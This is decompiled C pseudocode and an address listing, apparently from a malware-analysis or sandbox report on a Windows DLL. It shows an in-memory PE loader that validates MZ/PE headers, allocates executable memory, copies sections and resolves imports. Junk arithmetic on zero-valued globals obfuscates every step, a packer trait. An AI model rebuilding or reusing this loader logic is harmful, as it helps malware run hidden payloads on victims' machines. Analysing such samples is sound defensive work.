				 *(_t1248 + 0x14) = 0;
				if( *((intOrPtr*)(_t1248 + 0x60)) + ((_t691 * 0x3fffffff + _t6 * _t340 + _t933 << 1) - (_t934 * _t532 * _t795 + 1) * _t795 + _t532) * 2 < 0x40 + (_t5 * _t340 + (_t340 + _t4) * _t981 + _t933 + (_t981 * 0x3fffffff - (_t691 * _t932 + 1) * _t340 + _t795 + 2) * _t932 + _t691 + _t795) * 4) {
					L32:
					return 0;
				} else {
					_t988 =  *0x1004b0e0; // 0x0
					_t533 = _t532 * _t795;
					_t941 =  *0x1004b0e8; // 0x0
					_t989 = _t988 * _t691;
					 *(_t1248 + 0x10) = _t533;
					 *(_t1248 + 0x30) = _t989;
					_t542 =  *(_t1248 + 0x5c);
					if(( *_t542 & 0x0000ffff) != (_t533 - _t941 + _t941 * 2 - _t340 - _t691 << 1) - (_t691 + _t691 + (_t989 * _t691 + _t795) * _t795 * 2) *  *0x1004b0e0 + 0x5a4d) {
						goto L32;
					} else {
						_t995 = _t941 * _t691;
						 *(_t1248 + 0x20) = _t542[0x1e];
						 *(_t1248 + 0x2c) = _t995;
						_t545 =  *0x1004b0d8; // 0x0
						_t26 = (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545) * 2; // 0x7
						_t1126 =  *0x1004b0e0; // 0x0
						_t36 = _t691 + 1; // 0x1
						if( *((intOrPtr*)(_t1248 + 0x60)) + (_t36 * _t340 + (((_t941 * _t941 * _t941 + _t795 * _t795) * 0x3fffffff + _t1126) * _t795 + 1) * _t941 +  *(_t1248 + 0x10) + _t691) * 4 <  *(_t1248 + 0x20) + (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545 + _t26 + 7) *  *0x1004b0e0 + _t691 * 0x55555551 + _t545 + (_t691 * 0x55555551 + _t545) * 2 + (_t340 * 4 - 5) * _t795 + _t941 * 7 - _t340 + 0xf8) {
							goto L32;
						} else {
							_t1128 =  *0x1004b0e8; // 0x0
							_t951 = (_t795 - _t691 + 1) * _t795 + (_t795 - _t691 + 1) * _t795 * 4 - (_t691 + _t691 * 4 + 5) * _t1128 - _t691 + _t691 * 4 + ( *(_t1248 + 0x5c))[0x1e] +  *(_t1248 + 0x5c);
							_t47 = _t340 + 0x7fffffff; // 0x7fffffff
							 *(_t1248 + 0x18) = _t340 + _t340;
							_t52 = _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + 0x4550; // 0x4550
							_t1132 =  *0x1004b0e8; // 0x0
							_t563 =  *0x1004b0d8; // 0x0
							 *((intOrPtr*)(_t1248 + 0x24)) = _t951;
							if( *_t951 != _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + _t52 - ( *(_t1248 + 0x18) + 2 + _t1132 * 2) * _t563) {
								goto L32;
							} else {
								_t1135 =  *0x1004b0e0; // 0x0
								_t1138 =  *0x1004b0e0; // 0x0
								if(( *(_t951 + 4) & 0x0000ffff) != ((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138 + 0x14c + (((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138) * 2) {
									goto L32;
								} else {
									 *(_t1248 + 0x1c) =  *(_t951 + 0x38);
									_t1035 =  *0x1004b0e0; // 0x0
									 *(_t1248 + 0x20) = _t563 + _t563 * 2;
									if(( *(_t1248 + 0x1c) &  *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691 + 0x00000001 + ( *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691) * 0x00000002) != 0) {
										goto L32;
									} else {
										_t1041 =  *0x1004b0e0; // 0x0
										_t1042 =  *0x1004b0e8; // 0x0
										_t1043 =  *0x1004b0e8; // 0x0
										_t571 =  *0x1004b0d8; // 0x0
										_t1153 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x20) = ((_t563 * _t563 + _t1041) * _t563 + (_t563 - _t340 - _t691) * _t795 + (2 - _t1042 -  *0x1004b0d8) * _t1043 + (_t571 + _t795) * 2 - _t340 + _t691) * 0x78 + _t951 + ( *(_t951 + 0x14) & 0x0000ffff) + 0x18;
										_t579 =  *(_t1248 + 0x18);
										_t83 = _t795 - 2; // -2
										_t1049 = (_t795 + _t83 - _t579) * _t340 + ((_t1153 * _t795 + 1) * _t691 + 0x7fffffff) * _t1043 * 2 + ( *(_t951 + 6) & 0x0000ffff) - _t691 + _t691;
										if(_t1049 == 0) {
											_t580 =  *0x1004b0d8; // 0x0
											_t1050 =  *0x1004b0e8; // 0x0
										} else {
											 *((intOrPtr*)(_t1248 + 0x28)) =  ~_t579 - _t691 * 4;
											 *(_t1248 + 0x10) =  *(_t1248 + 0x20) + 0xc;
											_t673 =  *0x1004b0d8; // 0x0
											 *(_t1248 + 0x20) = _t1049;
											_t1086 =  *0x1004b0e8; // 0x0
											do {
												_t1237 =  *( *(_t1248 + 0x10) + 4);
												 *(_t1248 + 0x18) = _t1237;
												if(_t1237 != 0) {
													_t951 =  *((intOrPtr*)(_t1248 + 0x24));
													_t1091 = (4 + _t340 * 4) * _t673 + (_t1086 * 8 - 0xc) * _t795 +  *(_t1248 + 0x18) + (_t691 + _t691 * 2 + (_t691 + _t1086 * 2 + _t673 + 1) *  *0x1004b0e0 + _t1086) * 4 +  *( *(_t1248 + 0x10));
												} else {
													_t97 = _t795 + 0x7ffffffe; // 0x7ffffffe
													_t1094 =  *0x1004b0e0; // 0x0
													_t1091 =  *(_t1248 + 0x1c) + (((_t340 + _t691) * _t1086 + _t691) * 0x7fffffff + _t97 * _t795 + _t1094 * 2) * 2 +  *( *(_t1248 + 0x10));
												}
												 *(_t1248 + 0x18) = _t1091;
												if(_t1091 <=  *((intOrPtr*)(_t1248 + 0x28)) +  *(_t1248 + 0x14)) {
													_t673 =  *0x1004b0d8; // 0x0
												} else {
													_t1097 =  *0x1004b0e0; // 0x0
													_t673 =  *0x1004b0d8; // 0x0
													 *(_t1248 + 0x14) =  *(_t1248 + 0x18) + ((_t340 + _t795) * 0x3fffffff + ((_t340 *  *0x1004b0d8 + 1) * 0x3fffffff + _t1097) *  *0x1004b0e8 + _t1097 + _t691 + _t673) * 4;
												}
												_t1086 =  *0x1004b0e8; // 0x0
												 *(_t1248 + 0x10) =  *(_t1248 + 0x10) + 0x28;
												_t129 = _t1248 + 0x20;
												 *_t129 =  *(_t1248 + 0x20) - 1;
											} while ( *_t129 != 0);
										}
										_t133 =  *(_t1248 + 0x2c) * _t580 + 2; // 0x2
										 *0x1004d3bc(_t1248 + 0x34 + ((_t340 - _t691 - 4) * _t795 - (_t340 + _t133) * _t1050 + ( *(_t1248 + 0x30) + _t580 + 2) *  *0x1004b0e0 - _t691) * 0x6c);
										_t351 =  *0x1004b0e4; // 0x0
										_t692 =  *0x1004b0ec; // 0x0
										_t1165 =  *0x1004b0e8; // 0x0
										_t1051 =  *0x1004b0dc; // 0x0
										_t583 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x34) = E10002BF0((2 - _t351 * _t351) * _t583 - _t692 + _t692 - _t1165 + _t1051 +  *((intOrPtr*)(_t1248 + 0x38)), (1 - _t1165) * _t351 * _t1051 +  *((intOrPtr*)(_t951 + 0x50)));
										_t354 =  *0x1004b0d8; // 0x0
										_t142 = _t354 + 0x7ffffffe; // 0x7ffffffe
										_t143 = _t354 + 2; // 0x2
										_t356 =  *0x1004b0e4; // 0x0
										_t360 =  *0x1004b0ec; // 0x0
										_t146 = _t1051 + 0xa; // 0xa
										_t706 =  *0x1004b0d8; // 0x0
										 *(_t1248 + 0x1c) =  *(_t1248 + 0x34) + (_t356 * 0x7fffffff + _t142 * _t1165 + _t1051 + _t1051 + _t143 * _t583 << 1) - (_t1051 + _t146) * _t360;
										_t707 = _t706 * _t1051;
										 *(_t1248 + 0x14) = _t707;
										_t1166 =  *0x1004b0ec; // 0x0
										 *(_t1248 + 0x34) = (_t707 * 0xfffffffd - (_t1165 * _t1165 + 3 + _t1165 * _t1165 * 2) * _t583 + 3) * _t583;
										_t1167 =  *0x1004b0d8; // 0x0
										_t373 = E10002BF0( *((intOrPtr*)(_t1248 + 0x3c)) + _t360, ( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167 + (( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167) * 2 +  *(_t1248 + 0x34) +  *(_t1248 + 0x18));
										_t1249 = _t1248 + 8;
										if( *(_t1248 + 0x20) != _t373) {
											goto L32;
										} else {
											_t716 =  *0x1004b0ec; // 0x0
											 *(_t1249 + 0x20) = _t716 * _t1167;
											_t165 = _t1051 + 2; // 0x3
											_t717 =  *0x1004b0e8; // 0x0
											_t166 = _t1167 + 1; // 0x1
											_t385 =  *0x1004b0e4; // 0x0
											_t388 =  *0x1004b0ec; // 0x0
											_t398 =  *0x1004b0e4; // 0x0
											_t403 =  *0x1004b0ec; // 0x0
											_t722 =  *0x1004b0e8; // 0x0
											_t182 = _t403 + 1; // 0x1
											_t1168 =  *((intOrPtr*)(_t1249 + 0x74));
											_t405 =  *_t1168((( ~_t1051 << 1) - ( *((intOrPtr*)(_t1249 + 0x30)) + 2) *  *0x1004b0e4 + _t583 << 2) - (_t403 + _t403 + _t403 * 2 + _t182 * _t722 * _t722 * 4) * _t1167 +  *((intOrPtr*)(_t951 + 0x34)),  *(_t1249 + 0x20), ((_t388 * _t388 * _t1167 + _t388 * _t388 * _t1167 * 0x00000002 - _t1051 + _t1051 * 0x00000002) * _t583 - _t1051 + _t1051 * 0x00000002) * _t1051 + (_t583 * _t1167 + _t583 * _t1167 * 0x00000002 - 0x00000003) * _t717 -  *(_t1249 + 0x28) +  *(_t1249 + 0x28) * 0x00000002 + 0x00001000 | (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + 0x00002000, ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + 4,  *((intOrPtr*)(_t1249 + 0x78)));
											_t1250 = _t1249 + 0x14;
											_t585 = _t405;
											 *((intOrPtr*)(_t1250 + 0x10)) = _t585;
											if(_t585 != 0) {
												L21:
												_t836 =  *0x1004b0e8; // 0x0
												_t726 =  *0x1004b0ec; // 0x0
												_t213 = (_t836 -  *0x1004b0dc + 1) * _t836 + _t726 + 0x40; // 0x41
												_t840 =  *0x1004b0d8; // 0x0
												_t1064 =  *0x1004b0e4; // 0x0
												_t841 =  *0x1004b0e8; // 0x0
												_t410 = HeapAlloc(GetProcessHeap(), 8 + ((_t841 + 1) *  *0x1004b0dc + (_t726 * 0x3fffffff + _t840) *  *0x1004b0e0 + _t726 * 0x3fffffff + _t1064) * 4, (1 - _t726) *  *0x1004b0e0 + _t213);
												_t731 =  *0x1004b0e8; // 0x0
												_t411 =  *0x1004b0e0; // 0x0
												_t412 =  *0x1004b0ec; // 0x0
												_t1066 = _t410 + (_t731 - _t411 - _t412 +  *0x1004b0dc << 6);
												if(_t1066 != 0) {
													 *((intOrPtr*)(_t1066 + 4)) = _t585;
													_t413 =  *0x1004b0e0; // 0x0
													_t732 =  *0x1004b0ec; // 0x0
													_t224 = _t732 * 2; // -268738780
													_t853 =  *0x1004b0e8; // 0x0
													_t733 =  *0x1004b0d8; // 0x0
													 *((intOrPtr*)(_t1066 + 0x20)) =  *((intOrPtr*)(_t1250 + 0x68));
													asm("sbb eax, eax");
													 *((intOrPtr*)(_t1066 + 0x2c)) =  *((intOrPtr*)(_t1250 + 0x74));
													 *(_t1066 + 0x14) =  ~( ~((_t413 + _t732) * _t413 + _t224 + 0x00001000 - _t853 + _t733 << 0x00000001 &  *(_t951 + 0x16) & 0x0000ffff));
													 *((intOrPtr*)(_t1066 + 0x24)) =  *((intOrPtr*)(_t1250 + 0x6c));
													 *((intOrPtr*)(_t1066 + 0x34)) =  *((intOrPtr*)(_t1250 + 0x78));
													 *((intOrPtr*)(_t1066 + 0x28)) =  *((intOrPtr*)(_t1250 + 0x70));
													 *((intOrPtr*)(_t1066 + 0x1c)) = _t1168;
													_t423 =  *0x1004b0e8; // 0x0
													_t736 =  *0x1004b0e4; // 0x0
													 *((intOrPtr*)(_t1066 + 0x3c)) = ((3 - _t423 + _t423 * 2) *  *0x1004b0ec - 6) *  *0x1004b0e0 + _t736 + _t736 * 2 - _t423 + _t423 * 2 +  *((intOrPtr*)(_t1250 + 0x38));
													_t1169 =  *0x1004b0ec; // 0x0
													_t425 =  *0x1004b0e4; // 0x0
													_t738 =  *0x1004b0e0; // 0x0
													_t587 =  *0x1004b0d8; // 0x0
													_t739 =  *0x1004b0e8; // 0x0
													 *((intOrPtr*)(_t1250 + 0x2c)) =  *((intOrPtr*)(_t951 + 0x54));
													_t867 =  *0x1004b0e0; // 0x0
													_t433 = E10002C60((_t739 + _t739 * 2 - 3) * _t1169 +  *((intOrPtr*)(_t1250 + 0x64)) + _t587 * _t587 - _t867 + (_t587 * _t587 - _t867) * 2,  *((intOrPtr*)(_t951 + 0x54)) + (_t425 * _t1169 + _t738 + _t739 + _t587) * 2 + _t425 * _t1169 + _t738 + _t739 + _t587);
													_t1251 = _t1250 + 8;
													if(_t433 == 0) {
														L31:
														_push(_t1066);
														E10004DD0();
														goto L32;
													} else {
														_t743 =  *0x1004b0e0; // 0x0
														_t436 =  *0x1004b0e8; // 0x0
														_t437 =  *0x1004b0dc; // 0x0
														_t752 =  *0x1004b0e0; // 0x0
														_t1170 =  *0x1004b0e4; // 0x0
														_t438 =  *0x1004b0e8; // 0x0
														_t441 =  *((intOrPtr*)(_t1251 + 0x78))( *((intOrPtr*)(_t1251 + 0x1c)),  *(_t1251 + 0x34) + (_t587 * 0x7fffffff + _t752) * 2, 0x1000 + ((_t1170 + _t437) * 0x3fffffff + (_t1169 * 0x3fffffff + _t437 + 2) * _t1169 + _t438) * 4, 4 + (((_t436 + _t1169 + _t437) * 0x3fffffff + _t587 + 2) * _t437 + _t1169 + (3 - _t743 *  *0x1004b0e4) * _t436 + _t752 * 2) * 4,  *((intOrPtr*)(_t1251 + 0x78)));
														_t754 =  *0x1004b0dc; // 0x0
														_t590 =  *0x1004b0d8; // 0x0
														_t1174 =  *0x1004b0d8; // 0x0
														 *(_t1251 + 0x34) = _t441;
														_t442 =  *0x1004b0e8; // 0x0
														_t888 =  *0x1004b0e4; // 0x0
														_t444 =  *0x1004b0ec; // 0x0
														memcpy( *(_t1251 + 0x34),  *(_t1251 + 0x70), ((2 - _t442) *  *0x1004b0e4 + _t1174 + 2) *  *0x1004b0e0 - (_t754 * _t754 + _t442 + _t590) *  *0x1004b0ec - _t888 * _t442 - _t442 * _t754 - _t444 - _t444 - _t754 - _t754 +  *((intOrPtr*)(_t951 + 0x54)));
														_t604 =  *0x1004b0d8; // 0x0
														_t756 =  *0x1004b0dc; // 0x0
														_t448 =  *0x1004b0e0; // 0x0
														_t890 =  *0x1004b0ec; // 0x0
														_t891 =  *0x1004b0d8; // 0x0
														_t279 = _t448 + 0x2e9; // 0x2e9
														_t453 =  *((intOrPtr*)(_t1251 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_t1251 + 0x7c)) + 0x3c)) + (((_t448 + _t890) * _t890 + (_t604 - _t756 + 1) *  *0x1004b0e4 + _t448 + _t891) * 0xf8 + (_t448 * _t891 - 0xfa) *  *0x1004b0e8 - _t279 *  *0x1004b0e4 + (_t448 + 0xfffffffe) *  *0x1004b0ec + _t756 * 0x2e5) * 2;
														 *_t1066 = _t453;
														_t759 =  *0x1004b0e4; // 0x0
														_t1184 =  *0x1004b0e0; // 0x0
														_t895 =  *0x1004b0e8; // 0x0
														_t1187 =  *0x1004b0ec; // 0x0
														 *((intOrPtr*)(_t453 + 0x34)) = (2 - _t759 + _t759) *  *0x1004b0e0 +  *((intOrPtr*)(_t1251 + 0x30)) + (_t759 * 0x7ffffffd + ((_t759 *  *0x1004b0ec + _t895 + 1) * 0x7fffffff + _t1184 *  *0x1004b0d8 *  *0x1004b0dc) * _t895 + _t1187) * 2;
														_t900 =  *0x1004b0e8; // 0x0
														_t454 =  *0x1004b0e4; // 0x0
														_t761 =  *0x1004b0ec; // 0x0
														_t624 =  *0x1004b0d8; // 0x0
														_t293 = _t624 + 1; // 0x1
														_t463 =  *0x1004b0e0; // 0x0
														_push((0xc0 - (_t454 * _t900 * _t761 + _t454 * _t900 * _t761 * 2 << 6)) * _t900 - (_t293 * _t761 + _t293 * _t761 * 2 << 6) + _t1066);
														_push(_t951);
														_push((0xfffffffc -  *0x1004b0e4) *  *0x1004b0dc - (_t463 + 1) * _t900 * _t761 - _t761 * _t624 - _t900 +  *((intOrPtr*)(_t1251 + 0x88)));
														_push( *((intOrPtr*)(_t1251 + 0x84)));
														_t467 = E10002CA0();
														_t1251 = _t1251 + 0x30;
														if(_t467 == 0) {
															goto L31;
														} else {
															_t468 =  *0x1004b0e8; // 0x0
															_t765 =  *0x1004b0d8; // 0x0
															_t1200 =  *0x1004b0dc; // 0x0
															_t903 =  *0x1004b0e4; // 0x0
															_t905 =  *0x1004b0ec; // 0x0
															_t1202 = _t765 - _t905 + _t905;
															_t907 =  *0x1004b0dc; // 0x0
															_t299 = _t1202 - 2; // -2
															_t636 = (_t765 + _t299) * _t907 + (((_t468 * _t765 - _t1200) * _t765 - 2) *  *0x1004b0e0 + _t468 * _t468 - _t903 + _t903 - _t905) * 2 +  *((intOrPtr*)( *_t1066 + 0x34)) -  *((intOrPtr*)(_t951 + 0x34));
															 *((intOrPtr*)(_t1251 + 0x60)) = _t636;
															if(_t636 == 0) {
																 *((intOrPtr*)(_t1066 + 0x18)) = 1;
															} else {
																_t963 =  *0x1004b0e0; // 0x0
																_t1227 =  *0x1004b0e4; // 0x0
																_push( *((intOrPtr*)(_t1251 + 0x60)) + ((_t963 - _t1227 +  *0x1004b0ec << 1) - (_t468 *  *0x1004b0ec * _t907 * _t907 * _t907 + _t963 * _t468) * _t468 + _t907) * 4);
																_t970 =  *0x1004b0e0; // 0x0
																_t971 =  *0x1004b0e4; // 0x0
																_push((((_t970 * _t970 << 1) - _t971 + _t468 + _t468 - 2) * _t907 - (_t907 + 4 + _t765 * 2) * _t971 + (_t765 - _t468 + _t468) * 2 << 6) + _t1066);
																_t492 = E10003B80();
																_t924 =  *0x1004b0e0; // 0x0
																_t1251 = _t1251 + 8;
																 *((intOrPtr*)(_t1066 + 0x18)) = _t492 - (_t924 *  *0x1004b0d8 << 2);
															}
															_t469 =  *0x1004b0e4; // 0x0
															_t766 =  *0x1004b0e0; // 0x0
															_push((_t766 - _t469 *  *0x1004b0e8 *  *0x1004b0ec *  *0x1004b0dc << 8) + _t1066);
															_t473 = E10003F40();
															_t1251 = _t1251 + 4;
															if(_t473 == 0) {
																goto L31;
															} else {
																_t474 =  *0x1004b0e8; // 0x0
																_t770 =  *0x1004b0dc; // 0x0
																_t637 =  *0x1004b0e4; // 0x0
																_t318 = _t474 * 2; // 0x1
																_t954 =  *0x1004b0ec; // 0x0
																_push(((1 - _t474 - _t770) *  *0x1004b0d8 + (_t770 + _t318 + 1) *  *0x1004b0e0 + _t770 * 2 - _t637 - _t954 + _t474 << 8) + _t1066);
																_t475 = E10003570();
																_t1251 = _t1251 + 4;
																if(_t475 == 0) {
																	goto L31;
																} else {
																	_t913 =  *0x1004b0e0; // 0x0
																	_push((_t913 *  *0x1004b0d8 *  *0x1004b0dc << 7) + _t1066);
																	_t476 = E10003AD0();
																	_t1251 = _t1251 + 4;
																	if(_t476 != 0) {
																		_t478 =  *((intOrPtr*)( *_t1066 + 0x28));
																		 *((intOrPtr*)(_t1251 + 0x60)) = _t478;
																		if(_t478 == 0) {
																			 *(_t1066 + 0x38) = 0;
																			return _t1066;
																		} else {
																			if( *(_t1066 + 0x14) == 0) {
																				_t481 =  *0x1004b0d8; // 0x0
																				_t955 =  *0x1004b0e0; // 0x0
																				_t918 =  *0x1004b0ec; // 0x0
																				_t778 =  *0x1004b0e8; // 0x0
																				_t331 = _t955 * _t778 - _t918 + 1; // 0x1
																				 *(_t1066 + 0x38) = (_t778 * _t778 * _t481 * 4 - 4) * _t955 + (4 - _t481 * 4) * _t918 +  *((intOrPtr*)(_t1251 + 0x60)) + (_t481 + _t331) *  *0x1004b0dc * 4 +  *((intOrPtr*)(_t1251 + 0x10));
																				return _t1066;
																			} else {
																				_t780 =  *0x1004b0ec; // 0x0
																				_t921 =  *0x1004b0d8; // 0x0
																				_t956 =  *0x1004b0e4; // 0x0
																				_t642 =  *0x1004b0dc; // 0x0
																				_t962 =  *0x1004b0e0; // 0x0
																				 *0x1004d404 = (_t780 * _t921 - (_t956 + _t642) * _t956 - 3) *  *0x1004b0e8 - _t921 * _t642 + _t962 * _t962 - _t780 - _t780 +  *((intOrPtr*)(_t1251 + 0x60)) + _t780 * _t921 + _t921 +  *((intOrPtr*)(_t1251 + 0x10));
																				 *((intOrPtr*)(_t1066 + 0x10)) = 1;
																				return _t1066;
																			}
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
													}
												} else {
													_t1067 =  *0x1004b0d8; // 0x0
													_t928 =  *0x1004b0dc; // 0x0
													_t219 = ((_t1067 * _t928 - 1) * _t731 - 1) *  *0x1004b0e4 + _t412 + 0x8000; // 0x7fff
													 *((intOrPtr*)(_t1250 + 0x78))(_t585, 0, (_t412 * _t928 - 1) *  *0x1004b0e0 + _t219,  *((intOrPtr*)(_t1250 + 0x78)));
													return 0;
												}
											} else {
												_t789 =  *0x1004b0e4; // 0x0
												_t930 =  *0x1004b0dc; // 0x0
												_t1075 =  *0x1004b0d8; // 0x0
												_t1076 =  *0x1004b0ec; // 0x0
												_t194 = _t1076 - 4; // -4
												_t665 =  *0x1004b0e8; // 0x0
												_t498 =  *0x1004b0e0; // 0x0
												_t1084 =  *0x1004b0d8; // 0x0
												_t198 = (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084) * 2; // -3
												_t200 = _t1084 + 2; // 0x2
												_t1085 =  *0x1004b0ec; // 0x0
												_t668 =  *0x1004b0d8; // 0x0
												_t207 = (1 - _t668) * _t789 + _t1085 + _t930 + 0x1000; // 0x1001
												_t520 =  *0x1004b0e0; // 0x0
												_t1168 =  *((intOrPtr*)(_t1250 + 0x70));
												_t523 =  *_t1168(0,  *((intOrPtr*)(_t1250 + 0x20)) + _t520 *  *0x1004b0e8 * 2, (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084 + _t198 - 0x00000003) * _t789 - _t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002 + (_t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002) * 0x00000002 + 0x00002000 | (0x00000001 - _t668) * _t789 + _t1085 + _t930 + _t207, (1 - _t930) * _t665 + (1 - _t789 * _t930) * _t789 + _t498 + (_t1075 * _t1075 - _t789 * _t930 + _t194) * _t1076 + 4,  *((intOrPtr*)(_t1250 + 0x78)));
												_t1250 = _t1250 + 0x14;
												 *((intOrPtr*)(_t1250 + 0x10)) = _t523;
												if(_t523 == 0) {
													goto L32;
												} else {
													_t585 = _t523;
													goto L21;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}







































































































































































                                                                        0x10005263
                                                                        0x10005269
                                                                        0x10005271
                                                                        0x10005278
                                                                        0x10005291
                                                                        0x1000529e
                                                                        0x100052a9
                                                                        0x100052b4
                                                                        0x100052bf
                                                                        0x100052d2
                                                                        0x100052da
                                                                        0x10005304
                                                                        0x1000530c
                                                                        0x10006014
                                                                        0x1000601a
                                                                        0x10005312
                                                                        0x10005312
                                                                        0x10005318
                                                                        0x1000531b
                                                                        0x10005321
                                                                        0x10005324
                                                                        0x1000533f
                                                                        0x10005350
                                                                        0x10005361
                                                                        0x00000000
                                                                        0x10005367
                                                                        0x1000536c
                                                                        0x1000536f
                                                                        0x10005377
                                                                        0x1000537d
                                                                        0x10005392
                                                                        0x100053db
                                                                        0x100053f4
                                                                        0x10005409
                                                                        0x00000000
                                                                        0x1000540f
                                                                        0x1000540f
                                                                        0x10005434
                                                                        0x10005436
                                                                        0x10005444
                                                                        0x10005466
                                                                        0x1000546d
                                                                        0x10005477
                                                                        0x10005484
                                                                        0x10005488
                                                                        0x00000000
                                                                        0x1000548e
                                                                        0x1000548e
                                                                        0x100054b4
                                                                        0x100054cb
                                                                        0x00000000
                                                                        0x100054d1
                                                                        0x100054d4
                                                                        0x100054d8
                                                                        0x100054ec
                                                                        0x10005505
                                                                        0x00000000
                                                                        0x1000550b
                                                                        0x1000550b
                                                                        0x1000551b
                                                                        0x10005537
                                                                        0x10005542
                                                                        0x1000555f
                                                                        0x10005575
                                                                        0x10005579
                                                                        0x1000557d
                                                                        0x10005592
                                                                        0x10005594
                                                                        0x100056bc
                                                                        0x100056c2
                                                                        0x1000559a
                                                                        0x100055a5
                                                                        0x100055b0
                                                                        0x100055b4
                                                                        0x100055ba
                                                                        0x100055be
                                                                        0x100055c4
                                                                        0x100055c8
                                                                        0x100055cd
                                                                        0x100055d1
                                                                        0x1000563e
                                                                        0x10005642
                                                                        0x100055d3
                                                                        0x100055e1
                                                                        0x100055ec
                                                                        0x10005600
                                                                        0x10005600
                                                                        0x10005650
                                                                        0x10005654
                                                                        0x10005699
                                                                        0x10005656
                                                                        0x10005656
                                                                        0x10005686
                                                                        0x10005693
                                                                        0x10005693
                                                                        0x100056a3
                                                                        0x100056ac
                                                                        0x100056b0
                                                                        0x100056b0
                                                                        0x100056b0
                                                                        0x100056ba
                                                                        0x100056cf
                                                                        0x100056fb
                                                                        0x10005701
                                                                        0x10005706
                                                                        0x1000570c
                                                                        0x10005712
                                                                        0x10005724
                                                                        0x10005753
                                                                        0x10005757
                                                                        0x1000575c
                                                                        0x10005765
                                                                        0x10005770
                                                                        0x10005783
                                                                        0x10005788
                                                                        0x10005797
                                                                        0x1000579d
                                                                        0x100057a1
                                                                        0x100057b3
                                                                        0x100057cf
                                                                        0x100057d5
                                                                        0x100057dd
                                                                        0x100057f5
                                                                        0x100057fe
                                                                        0x10005803
                                                                        0x00000000
                                                                        0x10005809
                                                                        0x10005809
                                                                        0x10005814
                                                                        0x10005827
                                                                        0x1000582e
                                                                        0x10005845
                                                                        0x1000584d
                                                                        0x1000585d
                                                                        0x10005894
                                                                        0x100058c0
                                                                        0x100058c7
                                                                        0x100058cd
                                                                        0x100058e6
                                                                        0x10005907
                                                                        0x10005909
                                                                        0x1000590c
                                                                        0x10005910
                                                                        0x10005914
                                                                        0x10005a04
                                                                        0x10005a04
                                                                        0x10005a0a
                                                                        0x10005a34
                                                                        0x10005a38
                                                                        0x10005a3e
                                                                        0x10005a4f
                                                                        0x10005a72
                                                                        0x10005a78
                                                                        0x10005a80
                                                                        0x10005a89
                                                                        0x10005a99
                                                                        0x10005a9b
                                                                        0x10005ae8
                                                                        0x10005aeb
                                                                        0x10005af0
                                                                        0x10005afc
                                                                        0x10005b03
                                                                        0x10005b09
                                                                        0x10005b23
                                                                        0x10005b2c
                                                                        0x10005b2e
                                                                        0x10005b33
                                                                        0x10005b3a
                                                                        0x10005b41
                                                                        0x10005b44
                                                                        0x10005b47
                                                                        0x10005b4a
                                                                        0x10005b52
                                                                        0x10005b7d
                                                                        0x10005b80
                                                                        0x10005b86
                                                                        0x10005b8b
                                                                        0x10005b94
                                                                        0x10005b9f
                                                                        0x10005ba7
                                                                        0x10005bb8
                                                                        0x10005bd3
                                                                        0x10005bd8
                                                                        0x10005bdd
                                                                        0x10006008
                                                                        0x10006008
                                                                        0x10006009
                                                                        0x00000000
                                                                        0x10005be3
                                                                        0x10005be3
                                                                        0x10005bf5
                                                                        0x10005c07
                                                                        0x10005c27
                                                                        0x10005c47
                                                                        0x10005c4f
                                                                        0x10005c75
                                                                        0x10005c79
                                                                        0x10005c7f
                                                                        0x10005c85
                                                                        0x10005c90
                                                                        0x10005c94
                                                                        0x10005cbf
                                                                        0x10005ccf
                                                                        0x10005cec
                                                                        0x10005cf2
                                                                        0x10005cf8
                                                                        0x10005d08
                                                                        0x10005d13
                                                                        0x10005d23
                                                                        0x10005d36
                                                                        0x10005d70
                                                                        0x10005d72
                                                                        0x10005d74
                                                                        0x10005d7a
                                                                        0x10005d8e
                                                                        0x10005da9
                                                                        0x10005dd5
                                                                        0x10005dd8
                                                                        0x10005dde
                                                                        0x10005de3
                                                                        0x10005dec
                                                                        0x10005e05
                                                                        0x10005e13
                                                                        0x10005e1e
                                                                        0x10005e30
                                                                        0x10005e4e
                                                                        0x10005e4f
                                                                        0x10005e50
                                                                        0x10005e55
                                                                        0x10005e5a
                                                                        0x00000000
                                                                        0x10005e60
                                                                        0x10005e60
                                                                        0x10005e65
                                                                        0x10005e6b
                                                                        0x10005e8c
                                                                        0x10005e96
                                                                        0x10005ea2
                                                                        0x10005ea4
                                                                        0x10005eaa
                                                                        0x10005eba
                                                                        0x10005ebd
                                                                        0x10005ec1
                                                                        0x10005f58
                                                                        0x10005ec7
                                                                        0x10005ec7
                                                                        0x10005ee6
                                                                        0x10005f04
                                                                        0x10005f05
                                                                        0x10005f10
                                                                        0x10005f38
                                                                        0x10005f39
                                                                        0x10005f3e
                                                                        0x10005f4e
                                                                        0x10005f53
